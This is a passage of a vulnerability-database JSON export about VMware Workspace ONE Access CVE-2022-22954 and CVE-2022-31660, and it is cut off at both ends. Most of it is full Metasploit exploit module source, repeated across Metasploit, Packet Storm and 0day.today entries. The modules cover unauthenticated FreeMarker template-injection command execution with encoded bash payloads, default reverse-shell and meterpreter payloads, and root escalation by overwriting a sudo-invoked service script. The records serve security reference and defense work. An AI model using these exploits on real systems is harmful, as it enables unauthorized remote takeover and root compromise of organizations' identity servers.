'#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T06:44:31", "description": "This module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the \"horizon\" user.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T23:51:46", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-22954", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-03T16:52:50", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_WORKSPACE_ONE_ACCESS_CVE_2022_22954-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC\n 'wvu' # Exploit and independent analysis\n ],\n 'References' => [\n ['CVE', '2022-22954'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],\n ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],\n ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],\n ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']\n # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433\n ],\n 'DisclosureDate' => '2022-04-06',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n\n deregister_options('VHOST')\n end\n\n def check\n ret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\")\n\n return CheckCode::Unknown unless ret\n return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)\n\n CheckCode::Vulnerable\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Pass cmd to bash without word splitting\n bash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\"\n\n vprint_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, ssti_uri),\n 'vhost' => rand_text_alphanumeric(8..16),\n 'vars_get' => {\n %w[code error].sample => rand_text_alphanumeric(8..16),\n # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html\n ssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")})\n }\n }, datastore['CmdExecTimeout'])\n\n return unless res\n return '' unless res.code == 400 && res.body.include?('auth.context.invalid')\n\n res.body\n end\n\n def ssti_uri\n %w[\n /catalog-portal/hub-ui\n /catalog-portal/hub-ui/byob\n /catalog-portal/ui\n /catalog-portal/ui/oauth/verify\n ].sample\n end\n\n def ssti_param\n %w[deviceType deviceUdid].sample\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-08-04T16:04:42", "description": "", "cvss3": {}, "published": "2022-08-04T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-04T00:00:00", "id": "PACKETSTORM:167973", "href": "https://packetstormsecurity.com/files/167973/VMware-Workspace-ONE-Access-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Unix \n \nTARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'VMware Workspace ONE Access CVE-2022-31660', \n'Description' => %q{ \nVMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges \nto those of the root user by modifying a file and then restarting the vmware-certproxy service which \ninvokes it. The service control is permitted via the sudo configuration without a password. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Spencer McIntyre' \n], \n'Platform' => [ 'linux', 'unix' ], \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Targets' => [ \n[ 'Automatic', {} ], \n], \n'DefaultOptions' => { \n'PrependFork' => true, \n'MeterpreterTryToFork' => true \n}, \n'Privileged' => true, \n'DefaultTarget' => 0, \n'References' => [ \n[ 'CVE', '2022-31660' ], \n[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] \n], \n'DisclosureDate' => '2022-08-02', \n'Notes' => { \n# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service \n# is disabled by default though. \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK] \n} \n} \n) \n) \nend \n \ndef certproxy_service \n# this script's location depends on the version, so find it. \nreturn @certproxy_service if @certproxy_service \n \n@certproxy_service = [ \n'/usr/local/horizon/scripts/certproxyService.sh', \n'/opt/vmware/certproxy/bin/certproxyService.sh' \n].find { |path| file?(path) } \n \nvprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service \n@certproxy_service \nend \n \ndef sudo(arguments) \ncmd_exec(\"sudo --non-interactive #{arguments}\") \nend \n \ndef check \nunless whoami == 'horizon' \nreturn CheckCode::Safe('Not running as the horizon user.') \nend \n \ntoken = Rex::Text.rand_text_alpha(10) \nunless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token) \nreturn CheckCode::Safe('Cannot invoke the service control script with sudo.') \nend \n \nunless writable?(TARGET_FILE) \nreturn CheckCode::Safe('Cannot write to the service file.') \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# backup the original permissions and contents \nprint_status('Backing up the original file...') \n@backup = { \nstat: stat(TARGET_FILE), \ncontents: read_file(TARGET_FILE) \n} \n \nif payload.arch.first == ARCH_CMD \npayload_data = \"#!/bin/bash\\n#{payload.encoded}\" \nelse \npayload_data = generate_payload_exe \nend \nupload_and_chmodx(TARGET_FILE, payload_data) \nprint_status('Triggering the payload...') \nsudo(\"--background #{certproxy_service} restart\") \nend \n \ndef cleanup \nreturn unless @backup \n \nprint_status('Restoring file contents...') \nfile_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it \nwrite_file(TARGET_FILE, @backup[:contents]) \nprint_status('Restoring file permissions...') \nchmod(TARGET_FILE, @backup[:stat].mode & 0o777) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167973/vmware_workspace_one_access_certproxy_lpe.rb.txt"}, {"lastseen": "2022-05-03T15:49:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-03T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Template Injection / Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-03T00:00:00", "id": "PACKETSTORM:166935", "href": "https://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware Workspace ONE Access CVE-2022-22954', \n'Description' => %q{ \nThis module exploits CVE-2022-22954, an unauthenticated server-side \ntemplate injection (SSTI) in VMware Workspace ONE Access, to execute \nshell commands as the \"horizon\" user. \n}, \n'Author' => [ \n'mr_me', # Discovery \n'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC \n'wvu' # Exploit and independent analysis \n], \n'References' => [ \n['CVE', '2022-22954'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'], \n['URL', 'https://srcincite.io/advisories/src-2022-0005/'], \n['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'], \n['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis'] \n# More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433 \n], \n'DisclosureDate' => '2022-04-06', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\") \n \nreturn CheckCode::Unknown unless ret \nreturn CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/) \n \nCheckCode::Vulnerable \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nbash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\" \n \nvprint_status(\"Executing command: #{bash_cmd}\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, ssti_uri), \n'vhost' => rand_text_alphanumeric(8..16), \n'vars_get' => { \n%w[code error].sample => rand_text_alphanumeric(8..16), \n# https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html \nssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")}) \n} \n}, 3.5) \n \nreturn unless res \nreturn '' unless res.code == 400 && res.body.include?('auth.context.invalid') \n \nres.body \nend \n \ndef ssti_uri \n%w[ \n/catalog-portal/hub-ui \n/catalog-portal/hub-ui/byob \n/catalog-portal/ui \n/catalog-portal/ui/oauth/verify \n].sample \nend \n \ndef ssti_param \n%w[deviceType deviceUdid].sample \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166935/vmware_workspace_one_access_cve_2022_22954.rb.txt"}], "zdt": [{"lastseen": "2022-08-11T22:17:52", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-05T00:00:00", "id": "1337DAY-ID-37891", "href": "https://0day.today/exploit/description/37891", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://0day.today/exploit/37891", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-04T14:53:02", "description": "This Metasploit module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access, to execute shell commands as the horizon user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Template Injection / Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-04T00:00:00", "id": "1337DAY-ID-37684", "href": "https://0day.today/exploit/description/37684", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC\n 'wvu' # Exploit and independent analysis\n ],\n 'References' => [\n ['CVE', '2022-22954'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],\n ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],\n ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],\n ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']\n # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433\n ],\n 'DisclosureDate' => '2022-04-06',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n ret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\")\n\n return CheckCode::Unknown unless ret\n return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)\n\n CheckCode::Vulnerable\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n bash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\"\n\n vprint_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, ssti_uri),\n 'vhost' => rand_text_alphanumeric(8..16),\n 'vars_get' => {\n %w[code error].sample => rand_text_alphanumeric(8..16),\n # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html\n ssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")})\n }\n }, 3.5)\n\n return unless res\n return '' unless res.code == 400 && res.body.include?('auth.context.invalid')\n\n res.body\n end\n\n def ssti_uri\n %w[\n /catalog-portal/hub-ui\n /catalog-portal/hub-ui/byob\n /catalog-portal/ui\n /catalog-portal/ui/oauth/verify\n ].sample\n end\n\n def ssti_param\n %w[deviceType deviceUdid].sample\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37684", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-09-07T05:41:12", "description": "## VMware-CVE-2022-22954-POC\n\n**\u58f0\u660e:\u8be5POC\u4ec5\u4f9b\u4e8e\u5b66\u4e60\u4e13\u7528\uff0c\u7981\u6b62\u4e00\u5207\u8fdd\u6cd5\u64cd\u4f5c\uff0c\u5982\u679c\u8fdb\u884c\u6076\u610f\u7834\u574f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T10:14:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-07T05:13:35", "id": "A8AC5191-F5B7-5FE5-8702-B85CC7107869", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-09T21:11:41", "description": "# CVE-2022-22954\nCVE-2022-22954 VMware Workspace ONE Access free...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:26:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-11-09T18:15:43", "id": "479D22AB-BE97-51BA-82CC-F8945ED02516", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-28T09:00:26", "description": "# CVE-2022-22954\n\nThis package detects a subset of\n[CVE-2022-229...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 